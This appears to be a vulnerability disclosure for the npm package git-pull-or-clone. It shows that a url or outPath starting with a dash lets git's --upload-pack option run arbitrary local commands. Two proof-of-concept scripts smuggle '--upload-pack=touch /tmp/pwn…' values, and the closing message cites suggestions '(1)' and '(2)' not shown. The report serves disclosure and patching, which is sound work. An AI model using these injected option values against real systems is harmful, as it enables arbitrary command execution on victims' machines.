git-pull-or-clone
describes itself as a tool to ensure a git repo exists on disk and that it's up-to-date.
Resources:
- Project's GitHub source code: https://github.com/feross/git-pull-or-clone
- Project's npm package: https://npmjs.org/package/git-pull-or-clone
I'm reporting a Command Injection vulnerability in the git-pull-or-clone
npm package.
git clone also accepts the --upload-pack=<command> option, which tells git
which command to run to serve the pack on the remote side. For a local path or
file:// repository that command is spawned on the local machine, so anyone who
can place this option on the git command line can execute arbitrary commands on the OS.
The source uses the child process API spawn() rather than exec()
(see here: https://github.com/feross/git-pull-or-clone/blob/master/index.js#L28-L33), so no shell is involved
and shell metacharacters are harmless. However, the outPath
parameter is appended to the git clone argument list unguarded, so a value that starts
with a dash is parsed by git as a command line option (argument injection) and results in arbitrary command execution.
If users are in control of either the repository URL (url
) to clone or the directory path (outPath
) to clone it into, then the vulnerability applies.
Install git-pull-or-clone@2.0.1
, which is the latest version.
POC 1 (outPath controlled by the attacker):
```js
const gitPullOrClone = require('git-pull-or-clone')
// Any file:// URL works; the upload-pack helper is spawned locally before git
// checks whether the repository exists.
const repo = 'file:///tmp/zero12345'
// outPath is appended to the git argv unguarded, so git parses it as an option.
const path = '--upload-pack=touch /tmp/pwn3'
gitPullOrClone(repo, path, (err) => {
  if (err) throw err
  console.log('SUCCESS!')
})
```
Observe a new file created: /tmp/pwn3 (the clone itself fails afterwards, since touch does not speak the pack protocol, but the command has already run).
POC 2 (url controlled by the attacker):
```js
const gitPullOrClone = require('git-pull-or-clone')
// The injected option now arrives through the url parameter instead.
const repo = '--upload-pack=touch /tmp/pwn4'
const path = 'file:///tmp/zero12345'
gitPullOrClone(repo, path, (err) => {
  if (err) throw err
  console.log('SUCCESS!')
})
```
Observe a new file created: /tmp/pwn4
Liran Tal
Busy week on all fronts, Java and JavaScript! :D
Here's a patch for adding the relevant test cases and fixing the vulnerability per the above suggestion as pointed out in (1). You may choose to further harden it with ideas I shared in (2).
You can review the patch here and, when you're good to be on stand-by for a quick merge and a release push, I'd be happy to send a Pull Request over to the repo.